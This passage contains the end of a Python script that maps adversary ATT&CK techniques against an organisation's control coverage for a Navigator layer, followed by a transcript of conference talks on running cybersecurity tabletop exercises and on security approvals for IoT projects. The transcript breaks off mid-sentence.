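# Status -> (Navigator score, colour) used to paint each technique cell.
STATUS_STYLE = {
    "gap": (0, "#ff6666"),           # adversary uses it, nothing in place
    "detect-only": (1, "#ffcc66"),   # we would see it but not stop it
    "prevent-only": (2, "#99ccff"),  # blocked, but blind if the block fails
    "covered": (3, "#66cc66"),       # prevent and detect both present
}


def classify(technique_id, coverage):
    """Map a technique to a coverage status from the controls that address it."""
    caps = coverage.get(technique_id, set())
    has_prevent, has_detect = "prevent" in caps, "detect" in caps
    if has_prevent and has_detect:
        return "covered"
    if has_prevent:
        return "prevent-only"
    if has_detect:
        return "detect-only"
    return "gap"


def find_gaps(adversary, coverage):
    """Techniques the adversary uses for which no control exists at all."""
    return [tid for tid in adversary if classify(tid, coverage) == "gap"]


def build_layer(name, adversary, coverage, attack_version="12", navigator_version="4.8.0"):
    """Assemble a Navigator layer dict with one entry per adversary technique."""
    techniques = []
    for tid, (tname, tactic) in adversary.items():
        status = classify(tid, coverage)
        score, color = STATUS_STYLE[status]
        techniques.append({
            "techniqueID": tid,
            "tactic": tactic,
            "score": score,
            "color": color,
            "comment": f"{tname}: {status}",
            "enabled": True,
        })
    return {
        "name": name,
        "versions": {"attack": attack_version, "navigator": navigator_version, "layer": "4.4"},
        "domain": "enterprise-attack",
        "description": "Adversary techniques overlaid with control coverage (tabletop input)",
        "techniques": techniques,
        "legendItems": [{"label": s, "color": c} for s, (_, c) in STATUS_STYLE.items()],
    }


def to_json(layer):
    """Serialise the layer for the Navigator's open-existing-layer upload."""
    return json.dumps(layer, indent=2)


if __name__ == "__main__":
    layer = build_layer("Sector threat profile vs controls", ADVERSARY_TECHNIQUES, CONTROL_COVERAGE)
    print("Gaps to carry into the risk report:", find_gaps(ADVERSARY_TECHNIQUES, CONTROL_COVERAGE))
    print(to_json(layer))
```

Save the printed JSON to a file and load it through the Navigator's open-existing-layer option to get the coloured matrix screenshot Jason mentions for the risk report; the `find_gaps` list is the short version for the executive summary. Replacing the two constructed dictionaries with the technique list pulled from the group page and the control inventory from your own gap analysis is the whole adaptation.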

Okay, so we have purpose, objectives, requirements, content, collateral, post-analysis. I hope that some of this is interesting and cool, that it helps you understand the proper prior planning that can help you deliver a cool and exciting tabletop session, because what you want to do is use this plan. And if you've got a slide deck that goes along with it, great; if you've got a Kahoot that goes along with it, great. Use the plan that you built as your guide, and that'll help you make sure that you're not leaving anything behind, because when you're doing your facilitation you need to be 50% psychologist: you're watching the reactions, you are having to pivot, you

are having to read the audience in a very visceral way to make sure that you are impacting them effectively. You've got to be 50% game show host, right? You really are there to some extent to entertain. And 50% scribe. Okay, maybe I didn't do my math very well on that. Taking notes will be very important again when it comes down to copy-paste. What is Shark Boss, T-posing Shark Boss, going to demand of us, whether we know it or not? They're going to want paperwork, they're going to want a report, absolutely. And you know what I also did on my silly little website: here's a tabletop session report, very blank, very quick. If anybody wants the

actual Word documents, just, I don't know, dox me on LinkedIn or something, and I'd be happy to pass them along. An executive summary: fill that out last, you know why? Because you're going to copy-paste that from the rest of the document. But what you're going to do here, section number two: what did I do for preparation? Wait a minute, that's all in my plan. What did I do for facilitation? Wait a minute, most of that's in my plan. What did they do, what were my key findings and recommendations? Most of that, if you did your preparation right, is already in your plan; the rest is in your notes. Copy-paste, make your life easy,

especially the reporting piece, because reporting sucks, right? And then copy-paste everything back into an executive summary at the very beginning. Very quick, very clean, very dirty, I love it.

The accountability trap, and this is my second-to-last slide; I promised Thomas that we'll be on time, look at us go. I've had a few organizations that have come to me and said, hey Adam, I just bought this really cool tool, and, okay, as a consultant I have to put myself under the microscope for this one too. I look at some of the really cool tools out there like Immersive Labs, and it's very expensive and it's got some great kind of scenario stuff built into it. Who is overall accountable for the success or failure of your crisis simulation, your tabletop session, whatever you're doing? Who's overall accountable? You are. If Shark Boss came to you and

said, I need you to deliver a tabletop session, and it flops, and if you've even hired me and it flops, yes, you never hire me again, but what you also do is you damage your own reputation in your own organization. So don't fall into the trap that a lot of people do of just farming it out to someone else and expecting it to get done right. Understand your objectives, understand your demographic, your audience, the objectives you're trying to... understand your purpose. Okay, okay. Oh yeah, I want to give a plug to AJ. Um, AJ, have a big wave. Everybody look at AJ, point and laugh. No, I'm kidding. Um, AJ is a friend of mine who is building a

company around doing some of this work, and the reason that I wanted to give him a plug is because, uh, he's doing it right, is because he understands, in the same way that I do, we just have different models of how we go about doing this stuff, is understanding how to get your organization to feel good about its incident responses, to feel good and understand how to get better, because that's the whole goal. Cyber security needs to be a business enabler, and it would be lovely if we could do that inside crisis simulations instead of active incident response where we've just got an entire database dumped on Pastebin. So, reach out to, reach out to me

and talk about the stuff, reach out to AJ, talk about the stuff. We're, we're both, you know, very much incident response people and, and love doing this stuff. And what I... so I put some silly videos on LinkedIn, and this is kind of the tagline that I've used: cyber security shouldn't be scary. And we've had a couple of conversations about that, and I know Robert was trying to hammer that home too. FUD doesn't work. FUD has never worked. So why don't we do something better than FUD? How about we do something fun? How about we have some fun and deliver some cool things together, take our businesses along for a journey and, uh, and be their guides. Cyber

security is a business enabler. So that's what we did: we walked through receiving a request, we walked through determining a purpose, building a plan, facilitating a session, building a report. That's the end of my slides. Any questions, any thoughts, concerns? Anybody want to call me a donkey? I'm, uh, I'm here for you. Uh, any questions for the donkey?

All right, thank you Adam, thank you very much. [Applause] Oh, I almost forgot. Thomas: some say he once lost a kayak in Lake Bemeris, some say that he once fought a giraffe and won. All I know is he's our host, Thomas Matthews. [Applause] I've never fought a giraffe. We got about five minutes, so feel free to take a quick bio break and then we'll get set up with the next presentation.

All right, so let's, uh, just do the introduction here. We've got our next speaker, Vivek Ponnada. Uh, Vivek Ponnada is an operational technology practitioner with a bachelor's degree in electrical engineering and global experience on critical infrastructure projects, and currently works at Nozomi Networks as a regional sales director. Throughout his career Vivek has held multiple roles including controls engineer, sales, marketing and development, and services, covering control systems and cyber security solutions for power, oil, gas and water industries at GE and ICI Electrical Engineering. He is the co-lead for the Top 20 Secure PLC Coding Practices project, and recent talks and contributions include S4x22, Gartner Risk Summit, GrrCON and BSides Calgary, and of course BSides Edmonton last year, and

he is an active board member of the Mainland Advanced Research Society, MARS, in Vancouver, BC. He is a member of the ISA and is also a volunteer for ISACA. So, very involved in the cyber security community. So with his talk entitled Fun Times with IoT Security, please welcome to the BSides stage Vivek Ponnada.

All right, excellent. All that means is I'm old. It feels like that's all it meant, really, all the, uh, all the lines there. But, uh, today's topic is fun times with IoT security, so I took the fun part really seriously, so I have no content. I have a lot of slides and you'll recognize most of them, especially if you're a Calvin and Hobbes fan. You will realize that all of them are Calvin and Hobbes. I don't have any content, but bear with me, I think it'll be a fun conversation. So let's start off with the right Calvin and Hobbes comic there. As you can see, I'm setting my expectations low. Okay, that'll always help me: if you guys like it, great, if not,

hey, I already told you up front. Okay, and the views are all my own, not my company's. I work for Nozomi, but, um, I do a lot of IoT security and visibility projects, so I attempt to see many of these projects. So today we'll talk about what these projects typically start off as and what the missing pieces are, and of course thanks to Bill Watterson for all the inspiration. So, project initiation. So how do these IoT projects come around, typically? As you can see, I mean usually the last column in the Calvin and Hobbes comic has got a fun closure, right? So if you see this, most projects typically start off because some functionality is missing in

the existing, uh, either technology or tools or something like that, or they need some new thing that came on the market. So this new device, new widget, new software, new tool will fix something, right, or add some functionality. So most projects start off with that. But of course management doesn't want to spend money, right? They're always saying, hey, here's what you got, right? But most IoT projects start because there's some functional requirement. Then what's the approval process? And I'm taking the side of a security guy here, okay? So most of us here are security people, and if someone asks you, should we do this, should we install TeamViewer, should we install this new video camera,

should we install this new whatever widget, most times our answer is no, right? Because we think it's not secure, we think it's not the right implementation, or it's not the right fit. Um, so what do users conclude? They think that we're not fun. The bottom line is, they're like, man, I want to do this, but security is always obstructing me. Next up, on the really serious ones, we do a risk assessment, right? So a user comes to us and asks us for something, and we say, no, don't do it, and of course we think through, we think through all the scenarios, and we told them all the worst things that can happen, and they're like, man, I didn't

realize things were this bad, right? It's, again, going on the theme of not fun. Oftentimes when you say no, um, they're not seeing your intellect, they're not seeing your intelligence, they're not seeing your hard work behind the no. They're only seeing the fact that you said no. They wanted to do something, and, hey, I got this cool new IoT widget, I'm using this at home, I want to use it in my workspace, and all they hear is you said no. Now sometimes there's a negotiation involved, right? In this particular instance, for example, the user already di

[ feedback ]